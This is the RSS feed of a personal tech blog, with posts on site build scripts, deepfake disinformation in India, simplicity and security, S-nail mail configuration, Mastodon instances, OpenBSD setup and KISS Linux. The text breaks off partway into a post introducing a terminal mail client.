pages/blog/feed.xml
<rss xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" version="2.0">
 <channel>
 <title>icyphox's blog</title>
 <link>https://icyphox.sh/</link>
 <description>Computers, security and computer security.</description>
 <atom:link href="https://icyphox.sh/blog/feed.xml" rel="self" type="application/xml"/>
 <image>
 <title>icyphox logo</title>
 <url>https://icyphox.sh/icyphox.png</url>
 <link>https://icyphox.sh/</link>
 </image>
 <language>en-us</language>
 <copyright>Creative Commons BY-NC-SA 4.0</copyright>
 <item><title>Site changes</title><description><![CDATA[<p>The past couple of days, I’ve spent a fair amount of time tweaking this
site. My site’s build process involves
<a href="https://github.com/icyphox/vite">vite</a> and a bunch of
<a href="https://github.com/icyphox/site/tree/master/bin">scripts</a>. These
scripts are executed via vite’s pre- and post-build actions. The big
changes that were made were performance improvements in the
<code>update_index.py</code> script, and the addition of <code>openring.py</code>, which you
can see at the very bottom of this post!</p>

<h2 id="speeding-up-index-page-generation">speeding up index page generation</h2>

<p>The old script—the one that featured in <a href="/blog/hacky-scripts">Hacky
scripts</a>—was absolutely ridiculous, and not to
mention <em>super</em> slow. Here’s what it did:</p>

<ul>
<li>got the most recent file (latest post) by sorting all posts by
<code>mtime</code>.</li>
<li>parsed the markdown frontmatter and created a markdown table entry
like:</li>
</ul>

<div class="codehilite"><pre><span></span><code><span class="n">line</span> <span class="o">=</span> <span class="sa">f</span><span class="s2">"| [</span><span class="si">{</span><span class="n">meta</span><span class="p">[</span><span class="s1">'title'</span><span class="p">]</span><span class="si">}</span><span class="s2">](</span><span class="si">{</span><span class="n">url</span><span class="si">}</span><span class="s2">) | `</span><span class="si">{</span><span class="n">meta</span><span class="p">[</span><span class="s1">'date'</span><span class="p">]</span><span class="si">}</span><span class="s2">` |"</span>
</code></pre></div>

<ul>
<li>updated the markdown table (in <code>_index.md</code>) by in-place editing the
markdown, with the line created earlier—for the latest post.</li>
<li>finally, I’d have to <em>rebuild</em> the entire site since this markdown
hackery would happen at the very end of the build, i.e., it didn’t
actually get rendered itself.</li>
</ul>

<p>That…probably didn’t make much sense to you, did it? Don’t bother.
I don’t know what I was thinking when I wrote that mess. So with how it
<em>was</em> done aside, here’s how it’s done now:</p>

<ul>
<li>the metadata for all posts is nicely fetched and sorted using
<code>python-frontmatter</code>.</li>
<li>the metadata list is fed into Jinja for use in templating, and is
rendered very nicely using a simple <code>for</code> expression:</li>
</ul>

<pre><code>{% for p in posts %}
 &lt;tr&gt;
 &lt;td align="left"&gt;&lt;a href="/blog/{{ p.url }}"&gt;{{ p.title }}&lt;/a&gt;&lt;/td&gt;
 &lt;td align="right"&gt;{{ p.date }}&lt;/td&gt;
 &lt;/tr&gt;
{% endfor %}
</code></pre>

<p>A neat thing I learnt while working with Jinja is that you can use
<code>DebugUndefined</code> in your <code>jinja2.Environment</code> definition to ignore
uninitialized template variables. Jinja’s default behaviour is to remove
all uninitialized variables from the template output. So for instance,
if you had:</p>

<div class="codehilite"><pre><span></span><code><span class="p">&lt;</span><span class="nt">body</span><span class="p">&gt;</span>
 {{ body }}
<span class="p">&lt;/</span><span class="nt">body</span><span class="p">&gt;</span>

<span class="p">&lt;</span><span class="nt">footer</span><span class="p">&gt;</span>
 {{ footer }}
<span class="p">&lt;/</span><span class="nt">footer</span><span class="p">&gt;</span>
</code></pre></div>

<p>And only <code>{{ body }}</code> was initialized in your <code>template.render(body=body)</code>,
the output you get would be:</p>

<div class="codehilite"><pre><span></span><code><span class="p">&lt;</span><span class="nt">body</span><span class="p">&gt;</span>
 Hey there!
<span class="p">&lt;/</span><span class="nt">body</span><span class="p">&gt;</span>
<span class="p">&lt;</span><span class="nt">footer</span><span class="p">&gt;</span>

<span class="p">&lt;/</span><span class="nt">footer</span><span class="p">&gt;</span>
</code></pre></div>

<p>This is annoying if you’re attempting to generate your template across
multiple stages, as I was. Now, I initialize my Jinja environment like
so:</p>

<div class="codehilite"><pre><span></span><code><span class="kn">import</span> <span class="nn">jinja2</span>
<span class="kn">from</span> <span class="nn">jinja2</span> <span class="kn">import</span> <span class="n">DebugUndefined</span>

<span class="n">env</span> <span class="o">=</span> <span class="n">jinja2</span><span class="o">.</span><span class="n">Environment</span><span class="p">(</span><span class="n">loader</span><span class="o">=</span><span class="n">template_loader</span><span class="p">,</span> <span class="n">undefined</span><span class="o">=</span><span class="n">DebugUndefined</span><span class="p">)</span>
</code></pre></div>

<p>I use the same trick for <code>openring.py</code> too. Speaking of…let’s talk
about <code>openring.py</code>!</p>

<h2 id="the-new-webring-thing-at-the-bottom">the new webring thing at the bottom</h2>

<p>After having seen Drew’s <a href="https://git.sr.ht/~sircmpwn/openring">openring</a>,
my <a href="https://en.wikipedia.org/wiki/Not_invented_here">NIH</a> kicked in and I wrote
<a href="https://github.com/icyphox/openring.py"><code>openring.py</code></a>. It pretty much
does the exact same thing, except it’s a little more composable with
vite. Currently, it reads a random sample of 3 feeds from a list of
feeds provided in a <code>feeds.txt</code> file, and updates the webring with those
posts. Like a feed-bingo of sorts. ;)</p>

<p>I really like how it turned out—especially the fact that I got my CSS
grid correct on the first try!</p>
]]></description><link>https://icyphox.sh/blog/site-changes</link><pubDate>Wed, 27 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/site-changes</guid></item><item><title>The efficacy of deepfakes</title><description><![CDATA[<p>A few days back, NPR put out an article discussing why deepfakes aren’t
all that powerful in spreading disinformation.
<a href="https://www.npr.org/2020/05/07/851689645/why-fake-video-audio-may-not-be-as-powerful-in-spreading-disinformation-as-feare">Link to article</a>.</p>

<p>According to the article:</p>

<blockquote>
 <p>“We’ve already passed the stage at which they would have been most
 effective,” said Keir Giles, a Russia specialist with the Conflict
 Studies Research Centre in the United Kingdom. “They’re the dog that
 never barked.”</p>
</blockquote>

<p>I agree. This might be the case when it comes to Russian influence.
There are simpler, more cost-effective ways to conduct <a href="https://en.wikipedia.org/wiki/Active_measures">active
measures</a>, like memes.
Besides, America already has the infrastructure in place to combat
influence ops, and has been doing so for a while now.</p>

<p>However, there are certain demographics whose governments may not have
the capability to identify and perform damage control when
a disinformation campaign hits, let alone deepfakes. An example of this
demographic: India.</p>

<h2 id="the-indian-landscape">the Indian landscape</h2>

<p>The disinformation problem in India is way more sophisticated, and
harder to combat than in the West. There are a couple of reasons for
this:</p>

<ul>
<li>The infrastructure for fake news already exists: WhatsApp</li>
<li>Fact checking media in 22 different languages is non-trivial</li>
</ul>

<p>India has had a long-standing problem with misinformation. The 2019
elections, the recent CAA controversy and even more recently—the
coronavirus. In some cases, it has even led to
<a href="https://www.npr.org/2018/07/18/629731693/fake-news-turns-deadly-in-india">mob violence</a>.</p>

<p>All of this shows that the populace is easily influenced, and deepfakes
are only going to simplify this. What’s worse is explaining to a rural
crowd that something like a deepfake can exist—comprehension and
adoption of technology has always been slow in India, and can be
attributed to socio-economic factors.</p>

<p>There also exists a majority of the population that’s already been
influenced to a certain degree: the right wing. A deepfake of a Muslim
leader trashing Hinduism will be eaten up instantly. They are inclined
to believe it is true, by virtue of prior influence and given the
present circumstances.</p>

<h2 id="countering-deepfakes">countering deepfakes</h2>

<p>The thing about deepfakes is the tech to spot them already exists. In
fact, some can even be eyeballed. Deepfake imagery tends to have weird
artifacting, which can be noticed upon closer inspection. Deepfake
videos, of people specifically, blink / move weirdly. The problem at
hand, however, is the general public cannot be expected to notice these
at a quick glance, and the task of proving a fake is left to researchers
and fact checkers.</p>

<p>Further, India does not have the infrastructure to combat deepfakes at
scale. By the time a research group / think tank catches wind of it, the
damage is likely already done. Besides, disseminating contradictory
information, i.e. “this video is fake”, is also a task of its own.
Public opinion has already been swayed, and the brain dislikes
contradictions.</p>

<h2 id="why-havent-we-seen-it-yet">why haven’t we seen it yet?</h2>

<p>Creating a deepfake isn’t trivial. Rather, creating a <em>convincing</em> one
isn’t. I would also assume that most political propaganda outlets are
just large social media operations. They lack the technical prowess and
/ or the funding to produce a deepfake. This doesn’t mean they can’t
ever.</p>

<p>It goes without saying, but this post isn’t specific to India. I’d say
other countries with a similar socio-economic status are in a similar
predicament. Don’t write off deepfakes as a non-issue just because
America did.</p>
]]></description><link>https://icyphox.sh/blog/efficacy-deepfakes</link><pubDate>Mon, 11 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/efficacy-deepfakes</guid></item><item><title>Simplicity (mostly) guarantees security</title><description><![CDATA[<p>Although it is a very comfy one, it’s not just an aesthetic. Simplicity
and minimalism, in technology, is great for security too. I say “mostly”
in the title because human error cannot be discounted, and nothing is
perfect. However, a simpler tech stack is inherently more secure than
a complex monstrosity.</p>

<p>Let’s look at systemd, for example. It’s got over 1.2 million
lines of code. “Hurr durr but LoC doesn’t mean anything!” Sure, OK, but
can you <em>imagine</em> auditing this? How many times has it even been
audited? I couldn’t find any audit reports. No, the developers are not
security engineers and a trustworthy audit must be done by
a third-party. What’s scarier is that this thing runs on a huge percentage
of the world’s critical infrastructure and contains privileged core
subsystems.</p>

<p>“B-but Linux is much bigger!” Indeed, it is, but it has a thousand times
(if not more) the number of eyes looking at the code, and there have been
multiple third-party audits. There are hundreds of independent orgs and
multiple security teams looking at it. That’s not the case with
systemd—it’s probably just Red Hat.</p>

<p>Compare this to a bunch of shell scripts. Agreed, writing safe shell can
be hard and there are a ton of weird edge-cases depending on your shell
implementation, but the distinction here is <em>you</em> wrote it. Which means
you can identify what went wrong—things are predictable.
systemd, however, is a large black box, and its state at runtime is largely
unprovable and unpredictable. I am certain even the developers don’t
know.</p>

<p>And this is why I whine about complexity so much. A complex,
unpredictable system is nothing more than a large attack surface. Drew
DeVault, head of <a href="https://sourcehut.org">sourcehut</a>, wrote something
similar (yes, that’s the link; yes, it has a typo):</p>

<p><a href="https://sourcehut.org/blog/2020-04-20-prioritizing-simplitity/">https://sourcehut.org/blog/2020-04-20-prioritizing-simplitity/</a></p>

<p>He manually provisions all
sourcehut infrastructure, because tools like Salt, Kubernetes etc. are
just like systemd in our example—large monstrosities which can get you
RCE’d. Don’t believe me? See
<a href="https://threatpost.com/salt-bugs-full-rce-root-cloud-servers/155383/">this</a>.</p>

<p><em>This was day 3 of the #100DaysToOffload challenge. It came out like
a systemd-hate post, but really, I couldn’t think of a better example.</em></p>
]]></description><link>https://icyphox.sh/blog/simplicity-security</link><pubDate>Thu, 07 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/simplicity-security</guid></item><item><title>The S-nail mail client</title><description><![CDATA[<p>TL;DR: Here’s my <a href="https://github.com/icyphox/dotfiles/blob/master/home/.mailrc"><code>.mailrc</code></a>.</p>

<p>As I’d mentioned in my blog post about <a href="/blog/mael">mael</a>, I’ve been on
the lookout for a good, usable mail client. As it happens, I found
S-nail just as I was about to give up on mael. Turns out writing an MUA
isn’t all too easy after all. S-nail turned out to be the perfect client
for me, but I had to invest quite some time in reading the <a href="https://www.sdaoden.eu/code-nail.html">very
thorough manual</a> and exchanging
emails with its <a href="https://www.sdaoden.eu">very friendly author</a>. I did it
so you don’t have to<sup class="footnote-ref" id="fnref-read-man"><a href="#fn-read-man">1</a></sup>, and I present to you
this guide.</p>

<h2 id="basic-settings">basic settings</h2>

<p>These settings below should guarantee some sane defaults to get started
with. Comments added for context.</p>

<pre><code># enable upward compatibility with S-nail v15.0
set v15-compat

# charsets we send mail in
set sendcharsets=utf-8,iso-8859-1

# reply back in sender's charset
set reply-in-same-charset

# prevent stripping of full names in replies
set fullnames

# adds a 'Mail-Followup-To' header; useful in mailing lists
set followup-to followup-to-honour-ask-yes

# asks for an attachment after composing
set askattach

# marks a replied message as answered
set markanswered

# honors the 'Reply-To' header
set reply-to-honour

# automatically launches the editor while composing mail interactively
set editalong

# I didn't fully understand this :)
set history-gabby=all

# command history storage
set history-file=~/.s-nailhist

# sort mail by date (try 'thread' for threaded view)
set autosort=date
</code></pre>

<h2 id="authentication">authentication</h2>

<p>With these out of the way, we can move on to configuring our
account—authenticating IMAP and SMTP. Before that, however, we’ll
have to create a <code>~/.netrc</code> file to store our account credentials.</p>

<p>(This, of course, assumes that your SMTP and IMAP credentials are the
same. I don’t know what to do otherwise.)</p>

<pre><code>machine *.domain.tld login user@domain.tld password hunter2
</code></pre>

<p>Once done, encrypt this file using <code>gpg</code> / <code>gpg2</code>. This is optional, but
recommended.</p>

<pre><code>$ gpg2 --symmetric --cipher-algo AES256 -o .netrc.gpg .netrc
</code></pre>

<p>You can now delete the plaintext <code>.netrc</code> file. Now add these lines to
your <code>.mailrc</code>:</p>

<pre><code>set netrc-lookup
set netrc-pipe='gpg2 -qd ~/.netrc.gpg'
</code></pre>

<p>Before we define our account block, add these two lines for a nicer IMAP
experience:</p>

<pre><code>set imap-cache=~/.cache/nail
set imap-keepalive=240
</code></pre>

<p>Defining an account is dead simple.</p>

<pre><code>account "personal" {
 localopts yes
 set from="Your Name &lt;user@domain.tld&gt;"
 set folder=imaps://imap.domain.tld:993

 # copy sent messages to Sent; '+' indicates subdir of 'folder'
 set record=+Sent
 set inbox=+INBOX

 # optionally, set this to 'smtps' and change the port accordingly
 # remove 'smtp-use-starttls'
 set mta=smtp://smtp.domain.tld:587 smtp-use-starttls

 # couple of shortcuts to useful folders
 shortcut sent +Sent \
 inbox +INBOX \
 drafts +Drafts \
 trash +Trash \
 archives +Archives
}

# enable account on startup
account personal
</code></pre>

<p>You might also want to trash mail instead of permanently deleting it
(<code>delete</code> does that). To achieve this, we define an alias:</p>

<pre><code>define trash {
 move "$@" +Trash
}

commandalias del call trash
</code></pre>

<p>Replace <code>+Trash</code> with the relative path to your trash folder.</p>

<h2 id="aesthetics">aesthetics</h2>

<p>The fun stuff. I don’t feel like explaining what these do (hint: I don’t
fully understand it either), so just copy-paste it and mess around with
the colors:</p>

<pre><code># use whatever symbol you fancy
set prompt='> '

colour 256 sum-dotmark ft=bold,fg=13 dot
colour 256 sum-header fg=007 older
colour 256 sum-header bg=008 dot
colour 256 sum-header fg=white
colour 256 sum-thread bg=008 dot
colour 256 sum-thread fg=cyan
</code></pre>

<p>The prompt can be configured more extensively, but I don’t need it. Read
the man page if you do.</p>

<h2 id="essential-commands">essential commands</h2>

<p>Eh, you can just read the man page, I guess. But here’s a quick list off
the top of my head:</p>

<ul>
<li><code>headers</code>: Lists all messages, with the date, subject etc.</li>
<li><code>mail</code>: Compose mail.</li>
<li><code>&lt;number&gt;</code>: Read mail by specifying its number on the message list.</li>
<li><code>delete &lt;number&gt;</code>: Delete mail.</li>
<li><code>new &lt;number&gt;</code>: Mark as new (unread).</li>
<li><code>file &lt;shortcut or path to folder&gt;</code>: Change folders. For example: <code>file
sent</code></li>
</ul>

<p>That’s all there is to it.</p>

<p><em>This is day 2 of the #100DaysToOffload challenge. I didn’t think I’d
participate, until today. So yesterday’s post is day 1. Will I keep at
it? I dunno. We’ll see.</em></p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-read-man">
<p>Honestly, read the man page (and email Steffen!)—there’s
a ton of useful options in there. <a href="#fnref-read-man" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/s-nail</link><pubDate>Wed, 06 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/s-nail</guid></item><item><title>Stop joining mastodon.social</title><description><![CDATA[<p>No, really. Do you actually understand why the Mastodon network exists,
and what it stands for, or are you just LARPing? If you’re going to just
cross-post from Twitter, why are you even on Mastodon?</p>

<p>Okay, so Mastodon is a “federated network”. What does that mean? You
have a bunch of instances, each having their own userbase, and each
instance <em>federates</em> with other instances, forming a distributed
network. Got that? Cool. Now let’s get to the problem with
mastodon.social.</p>

<p>mastodon.social is the instance run by the lead developer. Why does
everybody flock to it? I’m really not sure, but if I were to hazard
a guess, I’d say it’s because people don’t really understand federation.
“Oh, big instance? I should probably join that.” Herd mentality?
I dunno.</p>

<p>And what happens when every damn user joins just one instance? It becomes
more Twitter, that’s what. The federation is gone. Nearly all activity
is generated from just one instance. Here are some numbers:</p>

<ul>
<li>Total number of users on Mastodon: ~2.2 million.</li>
<li>Number of users on mastodon.social: 529923</li>
</ul>

<p>Surprisingly, there’s an instance even bigger than
mastodon.social—pawoo.net. I have no idea why it’s so big and it’s
primarily Japanese. Its user count is over 620k. So mastodon.social and
pawoo.net put together form over 1 million users, that’s <em>more than</em> 50%
of the entire Mastodon populace. That’s nuts.<sup class="footnote-ref" id="fnref-federation-fallacy"><a href="#fn-federation-fallacy">1</a></sup></p>

<p>And you’re only enabling this centralization by joining mastodon.social! Really, what
even <em>is there</em> on mastodon.social? Have you even seen its local
timeline? Probably not. Join an instance with more flavor. Are you into,
say, the BSDs? Join bsd.network. Free software? fosstodon.org. Or host
your own for yourself and your friends.</p>

<p>If you really do care about decentralization and freedom, and aren’t
just memeing to look cool on Twitter, then move your account to another
instance.<sup class="footnote-ref" id="fnref-move-account"><a href="#fn-move-account">2</a></sup></p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-federation-fallacy">
<p><a href="https://rosenzweig.io/blog/the-federation-fallacy.html">https://rosenzweig.io/blog/the-federation-fallacy.html</a> <a href="#fnref-federation-fallacy" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
</li>

<li id="fn-move-account">
<p>Go to <code>/settings/migration</code> from your instance’s web
page. <a href="#fnref-move-account" class="footnoteBackLink" title="Jump back to footnote 2 in the text.">↩</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/mastodon-social</link><pubDate>Tue, 05 May 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/mastodon-social</guid></item><item><title>OpenBSD on the HP Envy 13</title><description><![CDATA[<p>My existing KISS install broke because I thought it would be a great
idea to have <a href="https://github.com/alpinelinux/apk-tools">apk-tools</a>
alongside the <code>kiss</code> package manager. It’s safe to say, that did not end
well—especially when I installed, and then removed a package. With
a semi-broken install that I didn’t feel like fixing, I figured I’d give
OpenBSD a try. And I did.</p>

<h2 id="installation-and-setup">installation and setup</h2>

<p>Ran into some trouble booting off the USB initially; it turned out to be
a faulty stick. Those things aren’t built to last, sadly. Flashed a new
stick, booted up. Setup was pleasant, very straightforward. Didn’t
really have to intervene much.</p>

<p>After booting in, I was greeted with a very archaic looking FVWM
desktop. It’s not the prettiest thing, and especially annoying to work
with when you don’t have your mouse set up, i.e. no tap-to-click.</p>

<p>I needed wireless, and my laptop doesn’t have an Ethernet port. USB
tethering just works, but the connection kept dying. I’m not sure why.
Instead, I downloaded the <a href="http://man.openbsd.org/iwm.4">iwm(4)</a>
firmware from <a href="http://firmware.openbsd.org/firmware/6.6/">here</a>, loaded
it up on a USB stick and copied it over to <code>/etc/firmware</code>. After that,
it was as simple as running
<a href="http://man.openbsd.org/fw_update.1">fw_update(1)</a>,
and the firmware is auto-detected and loaded. In fact, if you have working
Internet, <code>fw_update</code> will download the required firmware for you, too.</p>

<p>Configuring wireless is painless and I’m so glad to see that there’s no
<code>wpa_supplicant</code> horror to deal with. It’s as simple as:</p>

<pre><code>$ doas ifconfig iwm0 nwid YOUR_SSID wpakey YOUR_PSK
</code></pre>

<p>Also see <a href="http://man.openbsd.org/hostname.if.5">hostname.if(5)</a> to make
this persist. After that, it’s only a matter of specifying your desired
SSID, and <code>ifconfig</code> will automatically auth and procure an IP lease.</p>

<pre><code>$ doas ifconfig iwm0 nwid YOUR_SSID
</code></pre>

<p>By now I was really starting to get exasperated by FVWM, and decided to
switch to something nicer. I tried building 2bwm (my previous WM), but
that failed. I didn’t bother trying to figure this out, so I figured I’d
give <a href="http://man.openbsd.org/cwm.1">cwm(1)</a> a shot. After all, people
sing high praises of it.</p>

<p>And boy, is it good. The config is a breeze, and actually pretty
powerful. <a href="https://github.com/icyphox/dotfiles/blob/master/home/.cwmrc">Here’s mine</a>.
cwm also has a built-in launcher, so dmenu isn’t necessary anymore.
Refer to <a href="https://man.openbsd.org/cwmrc.5">cwmrc(5)</a> for all the config
options.</p>

<p>Touchpad was pretty simple to set up too—OpenBSD has
<a href="http://man.openbsd.org/wsconsctl.8">wsconsctl(8)</a>, which lets you set
your tap-to-click, mouse acceleration etc. However, more advanced
configuration can be achieved by getting Xorg to use the Synaptics
driver. Just add a <code>70-synaptics.conf</code> to <code>/etc/X11/xorg.conf.d</code> (make
the dir if it doesn’t exist), containing:</p>

<pre><code>Section "InputClass"
 Identifier "touchpad catchall"
 Driver "synaptics"
 MatchIsTouchpad "on"
 Option "TapButton1" "1"
 Option "TapButton2" "3"
 Option "TapButton3" "2"
 Option "VertEdgeScroll" "on"
 Option "VertTwoFingerScroll" "on"
 Option "HorizEdgeScroll" "on"
 Option "HorizTwoFingerScroll" "on"
 Option "VertScrollDelta" "111"
 Option "HorizScrollDelta" "111"
EndSection
</code></pre>

<p>There are a lot more options that can be configured, see
<a href="http://man.openbsd.org/synaptics.4">synaptics(4)</a>.</p>

<p>Suspend and hibernate just work, thanks to
<a href="http://man.openbsd.org/apm.8">apm(8)</a>. Suspend on lid-close just needs
one <code>sysctl</code> tweak:</p>

<pre><code>$ sysctl machdep.lidaction=1
</code></pre>

<p>I believe it’s set to 1 by default on some installs, but I’m not sure.</p>

<h2 id="impressions">impressions</h2>

<p>I already really like the philosophy of OpenBSD—security and
simplicity, while not losing out on sanity. The default install is
plentiful, and has just about everything you’d need to get going.
I especially enjoy how everything just works! I was pleasantly surprised
to see my brightness and volume keys work without any configuration!
It’s clear that the devs
actually dogfood OpenBSD, unlike uh, <em>cough</em> Free- <em>cough</em>. Gosh I hope
it’s not <em>the</em> flu. :^)</p>

<p>Oh and did you notice all the manpage links I’ve littered throughout
this post? They have manpages for <em>everything</em>; it’s ridiculous. And
they’re very thorough. Arch Wiki is good, but it’s incorrect at times,
or simply outdated. OpenBSD’s manpages, although catering only to
OpenBSD, have never failed me.</p>

<p>Performance and battery life are fine. Battery is in fact identical, if
not better than on Linux. OpenBSD disables HyperThreading/SMT for
security reasons, but you can manually enable it if you wish to do so:</p>

<pre><code>$ sysctl hw.smt=1
</code></pre>

<p>Package management is probably the only place where OpenBSD falls short.
<a href="http://man.openbsd.org/pkg_add.1">pkg_add(1)</a> isn’t particularly fast,
considering it’s written in Perl. The ports selection is fine, I have
yet to find something that I need not on there. I also wish they
debloated packages; maybe I’ve just been spoilt by KISS. I now have
D-Bus on my system thanks to Firefox. :(</p>

<p>I appreciate the fact that they don’t have a political document—a Code
of Conduct. CoCs are awful, and have only proven to be harmful for
projects; part of the reason why I’m sick of Linux and its community.
Oh wait, OpenBSD does have one: <a href="https://www.openbsd.org/mail.html">https://www.openbsd.org/mail.html</a>
;)</p>

<p>I’ll be exploring <a href="http://man.openbsd.org/vmd.8">vmd(8)</a> to see if I can
get a Linux environment going. Perhaps that’ll be my next post, but when
have I ever delivered?</p>

<p>I’ll close this post off with my new rice, and a sick ASCII art I made.</p>

<pre><code> \.-----./
 / ^ ^ ^ \
 (o)(o) ^ ^ |_/|
 {} ^ ^ > ^| \|
 \^ ^ ^ ^/
 /-----\
 ~icy
</code></pre>

<p><img src="https://x.icyphox.sh/zDYdj.png" alt="openbsd rice" /></p>
]]></description><link>https://icyphox.sh/blog/openbsd-hp-envy</link><pubDate>Fri, 17 Apr 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/openbsd-hp-envy</guid></item><item><title>The Zen of KISS Linux</title><description><![CDATA[<p><a href="/blog/five-days-tty">I installed KISS</a> early in January on my main
machine—an HP Envy 13 (2017), and I have since noticed a lot of changes
in my workflow, my approach to software (and its development), and in
life as a whole. I wouldn’t call KISS “life changing”, as that would be
overly dramatic, but it has definitely reshaped my outlook towards
technology—for better or worse.</p>

<p>When I talk about KISS to people—online or IRL—I get some pretty
interesting reactions and comments.<sup class="footnote-ref" id="fnref-bringing-up-kiss"><a href="#fn-bringing-up-kiss">1</a></sup>
Ranging from “Oh cool.” to “You must be
retarded.”, I’ve heard it all. A classic and a personal favourite of
mine, “I don’t use meme distros because I actually get work done.” It is
actually quite the opposite—I’ve been so much more productive using
KISS than any other operating system. I’ll explain why shortly.</p>

<p>The beauty of this “distro” is that it isn’t much of a distribution at all.
There is no big team, no mailing lists, no infrastructure. The entire
setup is so loose, and this makes it very convenient to swap things out
for alternatives. The main (and potentially community) repos all reside
locally on your system. In the event that Dylan decides to call it
quits and switches to Windows, we can simply just bump versions
ourselves, locally! The <a href="https://k1ss.org/guidestones">KISS Guidestones</a>
document is a good read.</p>

<p>In the subsequent paragraphs, I’ve laid out the different things about
KISS that stand out to me, and make using the system a lot more
enjoyable.</p>

<h2 id="the-package-system">the package system</h2>

<p>Packaging for KISS has been delightful, to say the least. It takes me
about 2 mins to write and publish a new package. Here’s the <code>radare2</code>
package, which I maintain, for example.</p>

<p>The <code>build</code> file (executable):</p>

<div class="codehilite"><pre><span></span><code><span class="ch">#!/bin/sh -e</span>

./configure <span class="se">\</span>
 --prefix<span class="o">=</span>/usr

make
make <span class="nv">DESTDIR</span><span class="o">=</span><span class="s2">"</span><span class="nv">$1</span><span class="s2">"</span> install
</code></pre></div>

<p>The <code>version</code> file:</p>

<pre><code>4.3.1 1
</code></pre>

<p>The <code>checksums</code> file (generated using <code>kiss checksum radare2</code>):</p>

<pre><code>4abcb9c9dff24eab44d64d392e115ae774ab1ad90d04f2c983d96d7d7f9476aa 4.3.1.tar.gz
</code></pre>

<p>And finally, the <code>sources</code> file:</p>

<pre><code>https://github.com/radareorg/radare2/archive/4.3.1.tar.gz
</code></pre>

<p>This is literally the bare minimum that you need to define a package.
There’s also the <code>depends</code> file where you specify the dependencies for
your package.
<code>kiss</code> also generates a <code>manifests</code> file to track all the files and
directories that your package creates during installation, for their
removal, if and when that occurs. Now compare this process with any
other distribution’s.</p>
<h2 id="the-community">the community</h2>

<p>As far as I know, it mostly consists of the <code>#kisslinux</code> channel on
Freenode and the <a href="https://old.reddit.com/r/kisslinux">r/kisslinux</a>
subreddit. It’s not that big, but it’s surprisingly active, and super
helpful. There have been some interesting new KISS-related projects
too: <a href="https://github.com/sdsddsd1/kiss-games">kiss-games</a>—a repository
for, well, Linux games; <a href="https://github.com/jedavies-dev/kiss-ppc64le">kiss-ppc64le</a>
and <a href="https://github.com/jedavies-dev/kiss-aarch64">kiss-aarch64</a>—KISS
Linux ports for PowerPC and ARM64 architectures;
<a href="https://github.com/wyvertux/wyvertux">wyvertux</a>—an attempt at
a GNU-free Linux distribution, using KISS as a base; and tons more.</p>

<h2 id="the-philosophy">the philosophy</h2>

<p>Software today is far too complex. And its complexity is only growing.
Some might argue that this is inevitable, and it is in fact progress.
I disagree. Blindly adding layers and layers of abstraction (Docker,
modern web “apps”) isn’t progress. Look at the Linux desktop ecosystem
today, for example—monstrosities like GNOME and KDE are a result of
this…new wave software engineering.</p>

<p>I see KISS as a symbol of defiance against this malformed notion. You
don’t <em>need</em> all the bloat these DEs ship with to have a usable system.
Agreed, it’s a bit more effort to get up and running, but it is entirely
worth it. Think of it as a clean table—feels good to sit down and work on,
doesn’t it?</p>

<p>Let’s take my own experience, for example. One of the first few pieces of
software I used to install on a new system was <code>dunst</code>—a notification
daemon. Unfortunately, it depends on D-Bus, which is Poetterware; ergo,
not on KISS. However, using a system without notifications has been very
pleasant. Nothing to distract you while you’re in the zone.</p>

<p>Another instance, again involving D-Bus (or not), is Bluetooth audio. As
it happens, my laptop’s 3.5mm jack is rekt, and I need to use Bluetooth
for audio, if at all. Sadly, Bluetooth audio on Linux hard-depends on
D-Bus. Bluetooth stacks that don’t rely on D-Bus do exist, like on Android,
but porting them over to desktop is non-trivial. However, I used this to
my advantage and decided not to consume media on my laptop. This has
drastically boosted my productivity, since I literally cannot watch
YouTube even if I wanted to. My laptop is now strictly work-only.
If I do need to watch the occasional video / listen to music, I use my
phone. Compartmentalizing work and play to separate devices has worked
out pretty well for me.</p>

<p>I’m slowly noticing myself favor low-tech (or no-tech) solutions to
simple problems too. Like notetaking—I’ve tried plaintext files, Vim
Wiki, Markdown, but nothing beats actually using pen and paper. Tech,
from what I can see, doesn’t solve problems very effectively. In some
cases, it only causes more of them. I might write another post
discussing my thoughts on this in further detail.</p>

<p>I’m not sure what I intended this post to be, but I’m pretty happy with
the mindspill. To conclude this already long monologue, let me clarify
one little thing y’all are probably thinking, “Okay man, are you
suggesting that we regress to the Dark Ages?”. No, I’m not suggesting
that we regress, but rather, progress mindfully.</p>

<div class="footnotes">
<hr />
<ol>
<li id="fn-bringing-up-kiss">
<p>No, I don’t go “I use KISS btw”. I don’t bring it
up unless provoked. <a href="#fnref-bringing-up-kiss" class="footnoteBackLink" title="Jump back to footnote 1 in the text.">↩</a></p>
</li>
</ol>
</div>
]]></description><link>https://icyphox.sh/blog/kiss-zen</link><pubDate>Fri, 03 Apr 2020 00:00:00 +0000</pubDate><guid>https://icyphox.sh/blog/kiss-zen</guid></item><item><title>Introducing mael</title><description><![CDATA[<p><strong>Update</strong>: The code lives here: <a href="https://github.com/icyphox/mael">https://github.com/icyphox/mael</a></p>

<p>I’ve been on the lookout for a good terminal-based email client since
forever, and I’ve tried almost all of them. The one I use right now
sucks a little less—<a href="https://git.sr.ht/~sircmpwn/aerc">aerc</a>. I have
some gripes with it though, like the problem with outgoing emails not
getting copied to the Sent folder, and instead erroring out with
a cryptic <code>EOF</code>—that’s literally all it says.
I’ve tried mutt, but I find it a little excessive. It feels like the
weechat of email—too many features that you’ll probably never use.</p>

<p>I need something clean and simple, less bloated (for the lack of
a better term). This is what motivated me to try writing my own. The
result of this (and not to mention, being holed up at home with nothing
better to do), is <strong>mael</strong>.<sup class="footnote-ref" id="fnref-oss"><a href="#fn-oss">1</a></sup></p>

<p>mael isn’t like your usual TUI clients. I envision this to turn out
